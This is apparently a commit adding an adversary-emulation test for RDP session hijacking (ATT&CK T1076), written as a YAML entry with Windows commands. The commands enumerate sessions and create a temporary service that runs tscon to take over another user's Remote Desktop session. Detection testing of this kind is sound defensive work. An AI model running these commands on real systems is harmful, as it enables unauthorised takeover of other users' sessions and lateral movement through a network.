T1076 shipment
This commit is contained in:
Michael Haag
2018-05-25 09:35:52 -04:00
parent 42823aac7a
commit 5f6014148d
+20
View File
@@ -0,0 +1,20 @@
---
attack_technique: T1076
display_name: Remote Desktop Protocol
atomic_tests:
- name: RDP
description: |
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization
supported_platforms:
- windows
executor:
name: command_prompt
command: |
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
sc.exe delete sesshijack